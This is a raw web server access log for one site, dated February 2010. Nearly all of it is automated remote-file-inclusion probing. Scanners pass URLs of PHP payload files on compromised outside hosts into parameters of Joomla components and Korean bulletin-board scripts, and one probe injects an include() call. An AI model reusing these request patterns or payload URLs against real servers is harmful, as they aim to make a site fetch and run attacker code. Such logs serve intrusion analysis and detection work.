218.38.136.126 - - [14/Feb/2010:07:20:35 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:20:35 -0800] "GET /logs/access_100206.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:20:38 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:20:38 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:20:38 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:20:42 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:20:42 -0800] "GET /logs/access_100112.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:20:42 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:20:43 -0800] "GET /logs/access_100123.log/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:20:43 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:20:43 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:20:43 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:20:43 -0800] "GET /logs/access_100125.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:20:43 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:07:20:44 -0800] "GET /logs/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:20:46 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:20:46 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:20:46 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:20:47 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:20:50 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:20:51 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:20:55 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:20:56 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:20:58 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:20:59 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:20:59 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:20:59 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
204.12.11.202 - - [14/Feb/2010:07:20:59 -0800] "GET /logs/access_100202.log//errors.php?error=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:20:59 -0800] "GET /logs/access_100125.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:20:59 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:21:02 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:21:07 -0800] "GET /logs/access_100109.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:21:07 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:21:08 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:21:08 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:21:08 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:21:08 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:21:11 -0800] "GET /logs/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:21:11 -0800] "GET /logs/access_100125.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:21:14 -0800] "GET /logs/access_100117.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:21:22 -0800] "GET /logs/access_100109.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:21:29 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:07:21:45 -0800] "GET /logs/access_100126.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:07:21:45 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:07:21:45 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:21:51 -0800] "GET /logs/access_100126.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:22:10 -0800] "GET /gallery.php//?path[docroot]=http://piwiarniaskierniewice.pl/images/ChuCu/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:22:10 -0800] "GET /logs//gallery.php//?path[docroot]=http://piwiarniaskierniewice.pl/images/ChuCu/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:22:15 -0800] "GET /logs/access_100205.log//gallery.php//?path[docroot]=http://piwiarniaskierniewice.pl/images/ChuCu/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:22:17 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:22:18 -0800] "GET /logs/access_100126.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:22:34 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:23:02 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.74 - - [14/Feb/2010:07:23:06 -0800] "GET /logs/?sPath=http://www.hankooknano.com/bbs/text/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.74 - - [14/Feb/2010:07:23:06 -0800] "GET /logs/access_100119.log/?sPath=http://www.hankooknano.com/bbs/text/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.74 - - [14/Feb/2010:07:23:06 -0800] "GET /?sPath=http://www.hankooknano.com/bbs/text/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:23:07 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:23:07 -0800] "GET /logs/access_100109.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:23:07 -0800] "GET /logs/access_100112.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:23:28 -0800] "GET /bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:23:28 -0800] "GET /logs//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:23:28 -0800] "GET /logs/access_100206.log//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:07:23:35 -0800] "GET /logs/access_100112.log//include/admin.lib.inc.php?site_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:07:23:42 -0800] "GET /errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:07:23:42 -0800] "GET /logs/errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:07:23:43 -0800] "GET /logs/access_100107.log/errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:23:59 -0800] "GET /logs/access_100126.log//gallery.php//?path[docroot]=http://piwiarniaskierniewice.pl/images/ChuCu/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:23:59 -0800] "GET /logs//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:23:59 -0800] "GET /bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:23:59 -0800] "GET /logs/access_100206.log//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [14/Feb/2010:07:24:01 -0800] "GET /logs/access_100111.log/lib/Loggix/Module/Calendar.php?pathToIndex=http://www.hankooknano.com/bbs/text/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:12 -0800] "GET /logs/access_100206.log//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:12 -0800] "GET /logs//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:12 -0800] "GET /bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:24:12 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:24:12 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:24:12 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:19 -0800] "GET /logs//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:19 -0800] "GET /bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:19 -0800] "GET /logs/access_100206.log//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:24:31 -0800] "GET /logs/access_100126.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:07:24:32 -0800] "GET /logs/?S=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:24:36 -0800] "GET /logs/access_100126.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:40 -0800] "GET /logs/access_100206.log//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:40 -0800] "GET /logs//bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:07:24:40 -0800] "GET /bbs///skin/dognara_gallery//view.php?view[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:24:51 -0800] "GET /logs/access_100119.log//index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:24:53 -0800] "GET /index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:24:54 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:25:00 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:25:00 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:25:00 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:25:24 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:25:24 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:25:24 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:25:24 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:07:25:35 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:25:58 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:25:58 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:25:59 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:25:59 -0800] "GET /logs/access_100210.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:26:08 -0800] "GET /logs/access_100103.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [14/Feb/2010:07:26:08 -0800] "GET /logs/access_100103.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:07:26:21 -0800] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:07:26:22 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:26:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.freeporngiant.com//assets/images/ahhe.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:07:26:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.freeporngiant.com//assets/images/ahhe.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:27:25 -0800] "GET /styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:27:25 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:27:25 -0800] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:07:27:51 -0800] "GET /logs/access_100214.log HTTP/1.0" 200 1930366 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:28:16 -0800] "GET /logs/access_100112.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:28:29 -0800] "GET /styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:28:30 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:07:28:30 -0800] "GET /logs/access.log//styles/internal/header.php?tpl_pgb_moddir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
